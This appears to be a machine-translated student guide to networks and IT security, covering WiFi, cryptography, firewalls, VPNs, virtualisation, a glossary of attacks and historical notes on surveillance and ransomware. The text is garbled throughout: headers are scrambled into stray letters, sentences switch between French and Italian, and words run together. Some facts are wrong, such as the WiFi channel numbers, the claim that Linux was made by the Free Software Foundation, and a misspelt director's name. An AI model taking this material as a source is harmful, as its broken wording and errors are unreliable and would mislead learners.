La bande de 5 GHz dispose de 23 canaux, en Europe on utilise une largeur de bande de 20 MHz
qui permet d'avoir 8 canaux non superposés (26, 40, 44, 48, 52, 56, 60 et 64).
Le signal à 2,4 GHz passe mieux à travers les obstacles mais est plus sujet aux interférences, le signal à
5Ghz a une couverture plus réduite mais offre de meilleures performances de transfert de données.
Canaux bloqués : à 2,4 GHz, les canaux 12, 13 et 14 sont bloqués car interdits par la loi dans plusieurs pays.
états, car ils peuvent par exemple être réservés aux forces militaires. Les seuls toujours
utilisables sont le 10 et le 11 (l'Espagne bloque aussi de 1 à 9). À 5 GHz en Italie sont
Autorisez 19 canaux.
WEP : protocole pour la sécurité du WiFi qui utilise deux clés de 64 ou 128 bits pour la
Chiffrement. Actuellement, il présente de sérieux problèmes de sécurité étant facilement violable en peu de temps.
WPA2: Wi-Fi Protected Access, protocollo per la sicurezza delle reti WiFi che utilizza chiavi
GU
D
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
ÉTUD
A
INTS
WPS : c'est un système de distribution des clés pour le WiFi afin de simplifier la
connexion des dispositifs dans les réseaux domestiques, qui repose sur un PIN et un accès physique
(typiquement un bouton placé sur l'AP ou sur l'hôte à connecter). Il est vulnérable aux attaques
de force brute pour la récupération du PIN et ne doit donc pas être activé si possible.
RADIUS : Service d'authentification à distance des utilisateurs par connexion, est un protocole qui sert à garantir
les exigences AAA pour l'accès à un réseau protégé. Utilise des paquets UDP pour le transport de
informations d'authentification et de configuration entre un serveur d'authentification (serveur de
accès au réseau, NAS - Serveur d'Accès au Réseau, en général un routeur) qui vérifie les
identifiants d'accès (nom d'utilisateur et mot de passe) en communiquant (de manière cryptée) avec
un serveur d'authentification (le serveur RADIUS) équipé d'une base de données d'utilisateurs autorisés. Le
Le NAS attribue généralement au client, s'il est autorisé, la configuration IP pour l'accès au réseau et
à ses services (intègre souvent un serveur DHCP).
WDS: Wireless Distribution System, tecnologia per la ripetizione del segnale WiFi ai vari
AP faisant partie d'un réseau, dans le cas où il n'est pas possible de les câbler. Cela présente un problème de
perte de performance dans la bande à mesure que le nombre de points d'accès en WDS augmente, car ils doivent
travailler sur le même canal (et sur le même SSID), où chaque AP fonctionne également comme un pont. Le
la bande passante utile de transmission est pratiquement réduite de moitié pour chaque point d'accès traversé.
GUD
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOPP
…
T
S
IEÉTUDA
INTS
QUELQ
C
UH
C
E
L
SO
R
U
A
Y
SR
E
PTOGRAPHE
I
Crittologia : (kryptos “caché” - logos “mot”) science qui s'occupe des écritures
cachées, qui ont leurs fondements dans les mathématiques et l'informatique.
Cryptographie : branche de la cryptologie qui étudie les systèmes pour cacher les messages et les
informations grâce à l'opération de chiffrement. Un algorithme de cryptographie
doit être facilement computable et inversible si la clé est connue, et difficilement
inversible en l'absence de la clé.
Crittanalisi : branche de la cryptologie qui s'occupe de trouver des systèmes pour déchiffrer
(déchiffrement) messages chiffrés.
Clé : c'est une information utilisée dans le processus de chiffrement par un algorithme.
Cryptographie symétrique (ou à clé privée) : technique de chiffrement dans laquelle la clé est
utilisée pour chiffrer et déchiffrer un texte. Les algorithmes à clé symétrique sont en moyenne
rapides dans l'exécution, cependant leur sécurité est liée à la confidentialité de la clé. Dans un
comunicazione la criticità è lo scambio della chiave tra mittente e destinatario.
Cryptographie asymétrique (ou à clé publique) : technique de chiffrement dans laquelle une clé
elle est utilisée pour chiffrer un texte et une clé différente est utilisée pour le déchiffrer. Les algorithmes
les clés publiques sont lentes à exécuter, mais elles contournent le problème de l'échange des
clés. En général, la clé publique est utilisée pour chiffrer, la clé privée pour
décoder, afin de garantir la confidentialité de la communication. Si, au contraire, on utilise le
la clé privée pour chiffrer et la clé publique pour déchiffrer obtient un mécanisme de
certification de l'identité de l'expéditeur d'un document.
• Non-répudiation : garantie que l'expéditeur ne peut pas nier avoir envoyé le message ;
Protocole AAAA : c'est un ensemble de règles et de spécificités qui réalisent dans le contexte
informaticiens les principes d'Authentification, d'Autorisation,
Contabilizzazione (Accounting) e Revisione (Auditing)
• Comptabilité : suivi des ressources utilisées (par exemple via des fichiers LOG) ;
Ciffrage de Vigenère : technique de chiffrement par laquelle chaque caractère individuel est chiffré.
message déplaçant la lettre à chiffrer d'un nombre de positions variable déterminé en fonction
à un mot clé (dettaverme), qui est répété sous le message;
OTP - One Time Pad (également appelé Chiffrement de Vernam) : c'est une technique de chiffrement (basée
sur la technique du Chiffre de Vigenère) où une clé aléatoire de la même longueur que le
texte à chiffrer, utilisable une seule fois. Le texte chiffré n'a plus aucune relation avec
celui d'origine. Sans connaître la clé, il est impossible de déchiffrer le message.
Critère de Shannon : un chiffrement est sûr si le texte chiffré ne révèle aucune information.
sur le texte en clair. Chaque message chiffré doit être d'une longueur au moins égale à celle du message en
clair.
Confusion: principe indiqué par Shannon, il ne doit pas y avoir de relation entre la clé et le texte.
GU
D
IE
DE
T
SIS
HÈME
E
SR
TÉSEAUX
POUR
AUTO
T
SOP
…
T
P
SIEÉ
TTUD
A
INTS
Effet avalanche (critère d'avalanche) : capacité d'un algorithme de cryptographie à produire des résultats
modo que par la modification d'un seul caractère du texte clair il y ait l'altération de
tout le texte chiffré (principe de diffusion), et que la modification d'un seul caractère de
la clé implique l'altération de tout le texte chiffré (principe de confusion). C'est
important, car si deux textes en clair similaires produisaient des textes chiffrés similaires, on pourrait
retrouver la clé.
Attaques passifs : menaces à la confidentialité des données. Ce sont les plus difficiles à identifier.
P
R
OX
YL
ER
EF
T
E
IW
A
LL
EQ
U
SR
C
U
H
E
LQ
O
E
U
SE
Défense périmétrique : ensemble des techniques pour la protection d'un réseau, à mettre en œuvre
entre le réseau externe et le réseau interne, sur le « périmètre » du réseau à protéger.
Pare-feu : élément passif de défense périmétrique d'un réseau. La défense par pare-feu dans
la générale s'occupe d'empêcher les accès non autorisés, du contrôle du trafic de données et de
blocage de tout trafic dû à des logiciels malveillants. Les pare-feu fonctionnent par le biais d'ensembles de règles de
• Pare-feu personnel : ce sont des logiciels de pare-feu installés directement sur la machine.
protéger. Par leur nature, ils sont moins sûrs, ils peuvent servir à contrôler sur une
machine les applications qui accèdent au réseau externe par exemple, ou dans des contextes privés et
non commerciaux.
• Pare-feu à filtre de paquets : s'occupent de filtrer les paquets individuellement selon les données
contenus dans les en-têtes. C'est un type de filtrage simple et léger au niveau de
ressources (et donc rapide). Ils opèrent principalement sur les 3 premiers niveaux de la pile OSI. Ce
la technique est sujette à des attaques de spoofing IP.
• Pare-feu à inspection étatique : les paquets sont analysés comme dans le filtrage de paquets
Pare-feu, en tenant compte des ports, de l'état de la connexion et des protocoles
utilisés, et donc aussi des paquets précédents d'une transmission d'informations.
Ils analysent jusqu'au niveau 4 de la pile OSI, fonctionnent via des tableaux qui peuvent subir
attaques de type DOS de saturation du contenu. Utilise des tableaux pour stocker à
exemple des numéros seq et ack d'une connexion TCP et les messages ACK et SYN correspondants
échangés.
• Pare-feu d'application : ils sont spécifiques à une application déterminée, analysant donc
fino au niveau 7 de la pile OSI. Ils sont très sûrs, mais impliquent une excessive
ralentissement sur le réseau.
GU
D
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
ÉTUD
A
INTS
DMZ (zone démilitarisée) : c'est une zone du réseau interposée entre le réseau externe et le réseau
interne, utilisée pour permettre l'accès depuis le réseau public externe à un serveur ou à d'autres
composants, par exemple, serveur mail et serveur web, afin de ne pas compromettre le réseau
interne à protéger. Il est possible d'utiliser plusieurs pare-feu pour isoler les DMZ, qui
généralement, ils agissent avec des systèmes de type filtre de paquets, et permettent la communication depuis
partie des machines dans le réseau interne via le service NAT. Elles peuvent cependant être
sujet aux attaques passives telles que le sniffing et aux attaques actives telles que le spoofing.
Hôte bastione : c'est la machine placée comme premier point de défense périmétrique d'un réseau.
configurée pour être spécialisée dans la protection contre les attaques extérieures.
ACL (Liste de Contrôle d'Accès) : c'est une liste de règles qui détermine les accès autorisés et interdits.
toutes les ressources d'un réseau. Les règles sont appelées Access Control Entry (ACE). Les règles se
consultation en ordre en partant de celle en haut de la liste jusqu'à la dernière, jusqu'à ce que cela se vérifie
une correspondance (match) : dans ce cas, la règle correspondante s'applique. En cas de non
vérifiez aucun match, la politique par défaut sera appliquée.
• Politique par défaut de refus : dans laquelle le trafic est bloqué par défaut, les règles indiquent quelles
Les types de trafic autorisés. C'est le critère qui permet une plus grande sécurité.
• Default-allow: politique dans laquelle le trafic est autorisé par défaut, les règles indiquent
Quels types de trafic sont bloqués.
• Masque de wildcard : indique quels bits d'une adresse IP doivent être vérifiés par la règle
dans l'ACL. Les bits à 1 dans le masque correspondent aux bits qui ne doivent pas être contrôlés.
Pour contrôler un sous-réseau entier, la valeur du masque de wildcard est obtenue en soustrayant à
[Link] la valeur du masque de sous-réseau concerné.
Le normes ACL spécifient seulement la source du trafic (elles doivent être placées près de la
source de destination), les ACL étendues spécifient également la destination, les ports et le
protocole (doivent être placées près de la source à filtrer).
* Nier
* Nier
GU
D
IE
DE
SYSTÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIET
ÉTUD
A
INTS
peut fournir les réponses si elles ont été mémorisées sans avoir à les demander à nouveau au serveur,
accélérant la communication. Le proxy peut surveiller et réguler les demandes (dans ce cas
fonctionne conceptuellement comme un pare-feu) à travers des règles appropriées, empêchant le trafic
vers des services non autorisés (par exemple, dans un réseau scolaire, l'accès peut être interdit)
réseaux sociaux d'IA ou à des sites malveillants ou interdits aux mineurs en fonction de listes appropriées qui les
raccolgono). L'utilisation d'un proxy permet également d'avoir un unique point de sortie de la
réseau interne pour les demandes effectuées vers des services externes au réseau lui-même, améliorant la
sécurité, et en masquant à l'extérieur les machines qui ont demandé le service ou la ressource,
garantissant l'anonymat (par exemple comme dans le cas de TOR).
GU
D
IE
DS
E
U
IJET
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIET
ÉTUD
A
INTS
QUE
V
L
P
CQ
L
N
H
E
S
USO
E
R
SE
VPN : un service de communication sûr et fiable qui crée un canal virtuel entre deux ou
plus de machines qui s'implémentent sur une infrastructure de réseau public (ce qui les rend
particulièrement flexibles et évolutives), caractérisée par des technologies qui garantissent les principes
de confidentialité, d'intégrité et d'authentification. Les VPN sont généralement utilisés pour
consentir l'accès aux ressources d'un réseau privé à des utilisateurs externes physiquement hors du réseau
stessa, ou pour permettre de maintenir une connexion sécurisée entre des sites distants et le siège
centrale d'une même entreprise. Avec des appareils périmétriques appropriés, un
tunneling sur internet.
Letunneling:c'estletermequireprésenteidéalementlaréalisationdelaconnexionsécurisée
dans un VPN, comme si un "tunnel" était creusé dans le réseau public à l'intérieur duquel se déroule la
communication protégée.
VPN distante : permet d'accéder à distance aux données présentes dans un réseau d'entreprise. Cela se réalise
via un client de connexion installé sur les machines des utilisateurs qui se connecte à un serveur
VPN pour l'accès aux ressources distantes.
Le VPN site à site : permettent de connecter des sites géographiquement éloignés entre eux, via des
tunnels logiques permanents. Ils peuvent être Extranet (connectent les sites d'entreprises et
organisations externes) ou Intranet (connectent des sites externes de la même entreprise). Il existe
divers types d'implémentation :
• Fiable : elles sont réalisées au niveau 2 de l'ISO/OSI, elles sont souvent fournies par les FAI et non
ils nécessitent un tunneling et une cryptographie. Ce sont pratiquement des « parties » de réseaux publics
dédiquer à des connexions privées.
• Sécurisé : ils reposent sur des protocoles de cryptographie sûrs, tels que SSL/TLS ou IPSec.
• Hybride : utilisent une technique mixte, en pratique en intégrant la cryptographie dans les VPN.
Fiable.
GUD
IE
DESYSTÈMEE
ST
RÉSEAUX
POUR
AUTOT
SOPP
T
…
S
IIE
ÉTUDA
INTS
QUELQ
CU
H
L
A
E
SO
U
'U
R
SE
THENT
F
ICA
T
OIN
E
N
D
R
V
A
E
OIS
N
N
SN
E
MT
B
S
R
D
U
E
IN
É
S
T
S
Environnements distribués : ce sont des systèmes logiciels exécutés sur plusieurs machines distinctes qui
ils apparaissent comme une seule machine. Ils se caractérisent par le partage des ressources et
distribution de la charge, une grande évolutivité et tolérance aux pannes. Les systèmes et les réseaux qui les
ils sont souvent hétérogènes, leur communication se fait par des messages;
L'architecture est structurée en niveaux et gérée par le « middleware » (niveau intermédiaire), qui se
interpose entre les différents OS (niveau bas) et les applications destinées aux utilisateurs (niveau élevé).
Kerberos : c'est un système qui prend en charge la mise en œuvre de la sécurité dans les systèmes
distribués, établissant des canaux sûrs entre le client et le serveur. Il est composé d'une authentification
Le serveur AS authentifie un utilisateur et lui fournit une clé pour le canal, ainsi qu'un ticket.
Service TGS qui établit des canaux sécurisés avec un serveur via des "tickets" c'est-à-dire
clés secrètes cryptées. Le client obtient d'abord un ticket de longue durée de l'AS, valable
pour toute la session de communication, et par la suite, il obtient un billet de courte durée du TGS
pour demander le service individuel.
(Microsoft) Active Directory : c'est un service qui "stocke les informations relatives aux
objets sur le réseau et simplifie la recherche et l'utilisation de ces informations par les
administrateurs et utilisateurs. [...] utilise un référentiel de données structuré comme base pour
une organisation logique et hiérarchique des informations de répertoire.
Microsoft). Le service de "directory" est une sorte de base de données organisée optimisée pour la
lecture et recherche sur de grands ensembles de données, mis à disposition de toutes les entités d'un réseau via
un Contrôleur de Domaine (Domain Controller), qui possède une base de données contenant les données
d'accès et les autorisations de tous les utilisateurs, y compris les ressources réseau telles que les ordinateurs et
imprimantes, via un mécanisme de stratégie de groupe (Objet de Stratégie de Groupe - GPO). Les données
ils sont ensuite partagés avec les clients présents sur le réseau. En d'autres termes, il sera possible d'accéder
avec son propre utilisateur et avoir ses propres ressources toujours disponibles depuis n'importe quel PC en
entreprise (Authentification Unique - SSO).
GUD
IE
ST
S
IHÈMEE
ST
RÉSEAUX
POUR
AUTOT
SO
E
É
T
P.U
P
.T
S
.ID
IA
INTS
QUELQ
C
UH
E
L
S
OU
A
S
RE
V I R T U A L I S AT I O N
Virtualisation : c'est une technique qui permet d'exécuter l'abstraction du matériel physique et
rendre le logiciel disponible. Via un hyperviseur (appelé aussi VMM - Virtual)
Machine Manager) le système d'exploitation et les applications sont séparés du matériel
physique. La machine qui exécute la virtualisation (le système matériel) est appelée hôte,
Les machines virtualisées sont dites invitées. Le VMM crée et exécute les machines virtuelles.
Techniques de virtualisation :
• Virtualisation complète : on réalise des systèmes virtuels du même type que le système
hôte physique
• Emulazione:si eseguono applicazioni su un sistema diverso da quello per cui sono scritte
(divers dallasimulazione, dans lequel un système d'exploitation est reproduit, même au niveau
logique
• Paravirtualisation : les OS invités accèdent au matériel physique de l'OS hôte par le biais de
API mises à disposition par l'hyperviseur, sans émuler le CPU;
• Virtualisation au niveau de l'OS : appelés également conteneurs, la virtualisation est gérée par
le noyau qui isole les ressources matérielles et logicielles utilisées par les différentes applications. Dans cette
les conteneurs techniques sont isolés les uns des autres, et aucune VM n'est utilisée et il n'y a pas de systèmes
•Type 2 : dettihosted, exécutés sur un système d'exploitation comme application (par exemple
Oracle Virtual Box, VMWare Player.
Interprétation : elle se base sur la lecture de chaque instruction du code machine à exécuter et
sur son exécution sur le système hôte, exploitant la possibilité d'émuler des éléments de
d'autres architectures (différentes ou non présentes, comme par exemple les registres des CPU) exploitant
zones de mémoire. La méthode est puissante, mais implique de nombreuses instructions à exécuter et donc un
charge considérable sur le CPU. Un exemple d'émulateur basé sur l'interprétation est le
populaire MAME, qui permet d'émuler le fonctionnement des ROM contenant le code
machine à jeux vidéo "de salle de jeux".
Recompilation dynamique : des blocs de code sont lus, traduits et optimisés pour
l'architecture hôte, en utilisant autant que possible la mise en mémoire tampon de portions de code de
utilisation fréquente.
GUD
IE
DE
T
SIHÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
É
SO
T
.U
P
.P
T
.D
S
IIA
INTS
QUELQC
UH
EO
SL
É
U
SA
E
C
RURT
IÉ
N
IFORMATQ
IA
UE
Attaques actives : utilisent des modes offensifs qui opèrent de manière directe (et
finalement destructive) sur les systèmes et les informations, par exemple des accès non autorisés,
modification ou suppression des informations, blocage des systèmes, usurpation d'identité
utilisateurs, etc...
Attaques passives : elles se limitent à la lecture des informations, à l'analyse du trafic, à l'"écoute".
sans apporter de modifications aux informations et aux systèmes.
0-days : une vulnérabilité encore inconnue (ou à peine rendue publique, pour laquelle il y a 0
jours pour la fixer) attaquable par un exploit.
Zombie Zéro : une attaque informatique célèbre qui exploitait un malware inséré dans des lecteurs de
codes-barres pour lancer des backdoors en exploitant des connexions sans fil. C'est particulièrement
significatif parce qu'il montre le potentiel dangereux des dispositifs IoT.
Hacker : terme qui naît dans les premières communautés virtuelles passionnées de programmation
En informatique, le terme « hack » désigne « un projet en cours de développement ou un
produit réalisé à des fins constructives. C’est à la base de la philosophie du logiciel libre et
de l'open source, en particulier pour le plaisir de modifier et d'améliorer des travaux, des produits,
projets. Hacker est aujourd'hui (de manière un peu limitative) considéré comme un expert dans un domaine particulier
Le cracker : c'est un expert en informatique et matières connexes qui exploite ses capacités à des fins
destructifs pour les systèmes des autres.
White Hat : c'est un hacker spécialisé dans les tests de pénétration à des fins éthiques telles que sensibiliser le
Ingénierie sociale : ensemble des techniques pour extorquer des informations à une personne pour
pouvoir l'exploiter pour réaliser des attaques actives contre un système informatique.
DoS : typologie d'attaque active dans laquelle on cherche à rendre un service inutilisable (Déni de service)
Service)
DDoS : attaque DoS de type distribué, c'est-à-dire réalisée en utilisant plusieurs postes d'attaque
(surtout bot).
Bot : abréviation de robot. Généralement, ce sont des logiciels qui effectuent des opérations.
automatizzate.
Le spoofing ARP : attaque qui repose sur la modification des tables ARP afin de réaliser un
MITM
MITM : indique une attaque de type Homme du Milieu, où un utilisateur s'interpose dans
communication entre deux hôtes pour en tirer des informations, de manière invisible pour les hôtes eux-mêmes.
Ingénierie inverse : technique par laquelle on essaie de reconstruire un code source à partir d'un
code compilé.
CSRF - Contre l'Usurpation de Requête Inter-Site : attaque qui repose sur la réutilisation sur Internet de
sessions utilisateur pour effectuer des actions nuisibles. Un cracker fait visiter son propre site par
victime pendant qu'elle est connectée à un site cible, elle réutilisera donc une action HTTP exécutée
de la victime sur son propre site en l'envoyant correctement au site cible en exploitant la
sessione encore active, ce qui permettra d'effectuer des actions non autorisées.
XSS - Cross-Site Scripting : ce sont des attaques qui exploitent les vulnérabilités des sites web (souvent
non mis à jour) par lequel on injecte (injection) des scripts malveillants dans des pages web, qui
permettent de diffuser des logiciels malveillants ou de voler des informations aux utilisateurs.
Élévation de privilèges : technique d'attaque active qui exploite des vulnérabilités d'un
GU
D
ID
EE
T
SHÉMA
T
QIUESR
TÉSEAUX
POUA
RUE
T
É
O
TT
.S
O
U
.D
.P
T
P
A
S
INTS
Deauth WiFi : technique de type DoS qui permet d'exploiter le protocole 802.11 pour
déconnecter un utilisateur du réseau WiFi s'il est combiné avec une technique de spoofing IP
victime.
Violation de données : c'est un incident informatique qui implique la violation d'informations confidentielles.
L'écoute : attaque passive qui implique l'écoute et l'interception non autorisée de données et
communications.
Meltdown et Spectre : vulnérabilités découvertes récemment (2018) qui concernent les CPU Intel,
AMD et ARM (les principaux producteurs mondiaux) qui permet aux programmes qui l'exploitent
d'accéder à des zones de mémoire non autorisées d'autres programmes.
Rootkit : logiciels malveillants utilisés pour accéder aux ressources d'un système sans
autorisation.
Ping of Death : attaque de type DoS qui exploitait une vulnérabilité du protocole IP via
envoi de commandes ping modifiées de manière appropriée pour provoquer un débordement de tampon dans les systèmes
causant le crash.
Point d'accès rogue : point d'accès inséré sans autorisation dans un réseau ou dans une zone couverte par
un réseau sans fil, dans le but d'effectuer des attaques MITM, du phishing, etc...
Défiguration : attaque active dans laquelle un site est remplacé par un site malveillant.
Serveur Rogue : c'est un serveur DHCP qui est inséré sans autorisation dans un réseau dans le but
de faire authentifier les victimes (en profitant du fonctionnement du DHCP, qui prévoit l'envoi dans
diffusion de demandes de configuration IP) afin de fournir une configuration
généralement utilisée pour utiliser des passerelles ou des DNS malveillants pour des attaques MITM ou pour
APPROFONDIMENTI:
SÉCURT
IÉ
NATO
INALE
VS
PRV
IACY
L'HISTOIRE
L'aspectdelasécuriténationaleahistoriquementjouéunrôledominantdansla
discussion sur la vie privée et l'intrusion de tiers dans les communications d'autrui. Depuis les années
Soixante sont des opérations notables à l'échelle mondiale de « Signal Intelligence » (SIGINT), c'est-à-dire la
collecte de données et d'informations à travers l'interception et l'analyse de signaux, qu'ils soient de nature
humaine, soient envoyés par des machines et des ordinateurs. Une des premières opérations à être réalisée
l'attention publique fut le projet « Echelon », par lequel plusieurs Nations
ils effectuent un suivi automatisé de milliards de communications,
principalement par e-mail, transitant sur internet, avec une large utilisation de l'interception directe
des grandes dorsales sous-marines de connexion intercontinentale. Non seulement des mots-clés uniques
elles sont interceptées, mais en utilisant des algorithmes innovants, des caractéristiques sont analysées
plus profondes, quel contexte sémantique et empreintes vocales. En nous déplaçant dans des temps plus
récemment, en 2013, les révélations d'Edward Snowden ont suscité un grand émoi, à l'époque
ancien technicien de la CIA (Central Intelligence Agency, l'agence de renseignement civile des États-Unis)
d'Amérique) et consultant de la NSA (National Security Agency, organisme gouvernemental des
États-Unis d'Amérique qui, avec la CIA et le FBI, s'occupe de la sécurité nationale)
publiés dans une série d'enquêtes journalistiques sur 'The Washington
Post" aux États-Unis (publication rendue célèbre par les enquêtes dans les années soixante-dix sur l'affaire "Watergate")
e au Royaume-Uni sur "The Guardian", accompagnées de la publication de dizaines de documents
réservés à la sécurité nationale qu'il avait recueillis pendant son travail pour la NSA, révélant
détails de différents programmes top-secrets de surveillance de masse opérés par le gouvernement
états-unien et britannique, également dans ce cas par le biais de l'interception des
communications à grande échelle, basées surtout sur l'analyse des "métadonnées", c'est-à-dire
informations qui sont ajoutées aux données échangées sur un réseau pour les décrire. À
par exemple, un fichier ou un document peut contenir en son sein des métadonnées avec des informations
GUD
IE
DESYSTÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
SO
T
É
.T
P
.P
U
T
.S
IIDA
INTS
cryptographie, tandis que la messagerie instantanée comme Whatsapp et Telegram est signalée
l'utilisation de la cryptographie de bout en bout, une technique de chiffrement de la communication qui permet
seul l'expéditeur et le destinataire peuvent lire les messages échangés. Tout cela rassure l'utilisateur, mais
n'est réellement suffisant pour garantir que la vie privée de l'individu soit respectée, car
il s'agit simplement d'une illusion de sécurité et d'anonymat. Si la communication est protégée par
l'accès externe et maintient la confidentialité, il en va autrement pour les métadonnées associées, qui
sont souvent diffusés en clair, sans cryptage), et en fait sont à la disposition de
sociétés qui fournissent le service, aussi bien que celles qui sont capables d'intercepter les communications, et
je suis capable de révéler beaucoup plus d'informations que l'utilisateur ne pourrait le penser, ou
être simplement conscient.
CN
IEFORUC
M
«T
I:Z
IENFOUR
»
Réalisé par Laura Portrais, Genre Documentaire - USA, 2014. Prix Oscar 2015 Meilleur
Documentaire.
APPROFONDISSEMENTS :
VIRUS
À
LAMODE
L'HISTOIRE
Très souvent, les auteurs de virus et d'attaques informatiques choisissent des noms particulièrement
"divertissants" et appropriés. En 1998, un Taïwanais a développé un virus pour Windows 95.
chiamato Chernobyl, che si diffuse sui computer di mezzo mondo infettando addirittura CD
pièces jointes à des revues et ordinateurs neufs préinstallés, qui s'activait automatiquement le 26 avril
(anniversaire de Tchernobyl, précisément) avec un effet dévastateur car il réécrivait le BIOS
rendant les PC hors d'usage (et les cartes mères à jeter...).
En 2017, l'une des pires infections par ransomware de l'histoire s'est produite via
l'exploit EternalBlue. L'exploit exploite une vulnérabilité de Windows, et a été rendu public par un groupe
hacker le 14 avril. Exactement un mois avant, Microsoft avait déjà publié un correctif de
la sécurité qui corrigeait précisément la faille exploitée par EternalBlue, mais qui ne couvrait pas
exemple Windows XP, Windows 8 et Windows Server 2003. Cependant, ces versions étaient (et
probablement encore largement utilisées, et pas tout le monde avait pris des dispositions pour
mettre à jour ses systèmes avec Windows Update. Le 12 mai, le ver WannaCry est venu
lancé dans le monde entier par un groupe de hackers, frappant en quelques jours plus de 200 000
computer nel mondo, facendo vittime anche in importanti aziende di telecomunicazioni e
ministère.
GUD
IE
DE
T
SIHÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
É
SO
T
.U
P
.P
T
.D
S
IIA
INTS
intérêt pour l'IoT). En s'appuyant sur les "utonti" (mais aussi sur les utilisateurs un peu plus expérimentés)
exploiter des techniques d'ingénierie sociale, les effets sont souvent dévastateurs, surtout
parce qu'ils sont capables de paralyser et de mettre en crise des entreprises et des organismes gouvernementaux. En 2019
plusieurs villes des États-Unis ont été touchées par des attaques par ransomware : la petite ville
la ville de Lake City en Floride a choisi de payer environ 400 mille dollars en bitcoin (monnaie
particulièrement appréciée des criminels car difficilement traçable) pour débloquer les
services appropriés (mais sans y parvenir complètement, d'ailleurs il n'est pas garanti que traiter avec
un criminel ait des garanties); Baltimore en revanche a refusé de payer la rançon et s
estime qu'il a dû dépenser environ 5 millions de dollars pour la restauration des systèmes.
À part le caractère spectaculaire des cas, cela attire l'attention sur le principal facteur utilisé par
criminels pour attaquer : l'utilisateur. C'est souvent un employé distrait, inexpérimenté, ou même
credulone à compromettre un système entier avec un simple clic sur une pièce jointe d'une
mail. Oppure un tecnico responsabile della manutenzione della rete informatica, o un
administrateur réseau, qui traite légèrement les mises à jour du système d'exploitation et des
logiciels en cours utilisés, ou sous-estime les problèmes de sécurité possibles, tels que la
nécessité d'un pare-feu ou de la garde des mots de passe. Il suffit de vérifier combien de
des entreprises et des bureaux publics utilisent encore des systèmes basés sur Windows XP ou Windows 7
qui n'ont même plus le support de Microsoft. Souvent, il manque aussi des séries
procédures de sauvegarde et de reprise après sinistre.
GLOSSAIRE
Utonto : dans le jargon informatique (dettoluserin en anglais, contraction de loser et user) est le typique
utilisateur inexpérimenté utilisant un système, et qui ne se préoccupe pas vraiment des risques
qui peuvent en découler.
Ransomware : c'est un malware qui vise à limiter l'accès à l'appareil qu'il infecte.
exemple de cryptage des données à l'aide d'une clé secrète pour les rendre illisibles)
demandant une rançon à payer à l'utilisateur final. C'est précisément les attaques par cryptographie
ils sont particulièrement efficaces car ils sont difficiles à résoudre. Ils sont souvent véhiculés
par ingénierie sociale, en exploitant l'inexpérience des utilisateurs d'ordinateurs. Ou bien, et c'est
le pire des cas, ils exploitent des 0-days.
GU
D
IE
DE
T
SIHÈME
E
SR
TÉSEAUX
POUR
AUT
E
OÉ
T
S
.T
O
.U
P
.T
D
P
SIANTS
APPROFONDISSEMENTS :
MA
N
ITENANO
TUVER
V
T
LSOG
C
IE
IL
LIBERO
Open Source : définit un logiciel dont le code source est public. Il repose sur les éléments suivants
principes
Avantages de l'Open Source : un logiciel peut disposer de communautés qui opèrent dans
de manière continue et productive sur le code. Les communautés offrent un soutien, des ressources et
nouvelles fonctionnalités, même au niveau des idées. Mises à jour pour les bugs et les vulnérabilités
ils peuvent recevoir des interventions rapides. On peut modifier le code pour résoudre
problématiques spécifiques à son domaine de travail ou de recherche. De plus, étant le
le code est librement consultable, vous êtes assuré de son intégrité et de l'absence de
exemple de malware, spyware ou backdoor.
Avantageséconomiquesdel'OpenSource:lesentreprisespeuventrépartirlescoûtsdedéveloppement
Parmi eux, même entre concurrents. Les coûts de support dans le logiciel propriétaire sont réduits.
GUD
IE
DESYSTÈMEE
ST
RÉSEAUX
POUR
AUTOT
SE
O
ÉT
.P.U
P
T
.S
ID
IA
INTS
successivamente del supporto della community). Oppure aziende investono nello sviluppo
un produit open source pour détenir une position dominante sur le marché,
obtenir des revenus grâce aux redevances et à d'autres produits véhiculés par le logiciel : un exemple en est
Mozilla Firefox, qui a gagné plus de 500 millions de dollars grâce aux redevances en 2017
payées par les investisseurs (souvent liées à l'utilisation de leur propre moteur de recherche configuré
comme page d'accueil).
Logiciel libre : c'est un type de licence qui définit un logiciel garantissant plusieurs libertés.
à l'utilisateur :
• Liberté d'aider d'autres utilisateurs, c'est-à-dire la possibilité de distribuer des copies du logiciel;
Unix : système d'exploitation propriétaire principalement utilisé dans les systèmes mainframe,
développé par les laboratoires AT&T et Bell.
Linux : c'est le premier système d'exploitation exemple de logiciel libre, réalisé à l'origine par la Free
Software Foundation, organisation à but non lucratif fondée par Richard Stallman en
années quatre-vingt pour éliminer les restrictions sur la copie, la redistribution, la compréhension et
modification du logiciel, avec l'objectif initial de créer une alternative libre à Unix. Le noyau
écrit par l'étudiant finlandais de l'époque Linus Torvalds.
Le noyau : c'est le logiciel qui gère l'accès au matériel pour les processus en cours d'exécution sur un
ordinateur.
APPROFONDISSEMENTS :
GUERRE CYBERNÉTIQUE
Étrange jeu. Le seul coup gagnant est de ne pas jouer.
CN
IEFORUM
W
«:ARGAMES
»
Le film champion du box-office en 1983 anticipe pour la première fois l'opinion publique
le thème de la cyberguerre, c'est-à-dire les effets d'une offensive potentielle
militaire ou criminel envers des systèmes informatiques, ou simplement (et c'est l'intrigue du film) par
partie d'un hacker ignorant et bricoleur.
Le film montre des techniques de hacking de l'époque (qui sont les premières de l'histoire) telles que le
phreaking (ben nota à Kevin Mitnick), les attaques par force brute (pour identifier des systèmes
à qui se connecter en appelant le modem à des numéros en séquence), l'accès à des systèmes non
protégés par une authentification sécurisée (le protagoniste qui accède au registre électronique de la
école et on change la note), l'ingénierie sociale (avec laquelle on remonte au mot de passe
du compte du créateur du système de sécurité, avec un accès identifiable presque comme
une porte dérobée) et la tromperie cybernétique (avec laquelle le système est trompé empêchant la
«guerre nucléaire mondiale» simplement en le mettant en échec en jouant au morpion avec soi-même
même)
Le Président des États-Unis Ronald Reagan a été impressionné par le film et a demandé à ses experts
si les systèmes informatiques du gouvernement pouvaient être attaqués de manière si simple (ou fortuite).
Depuis 1967, il existait des rapports techniques sur les vulnérabilités possibles de tels systèmes, mais
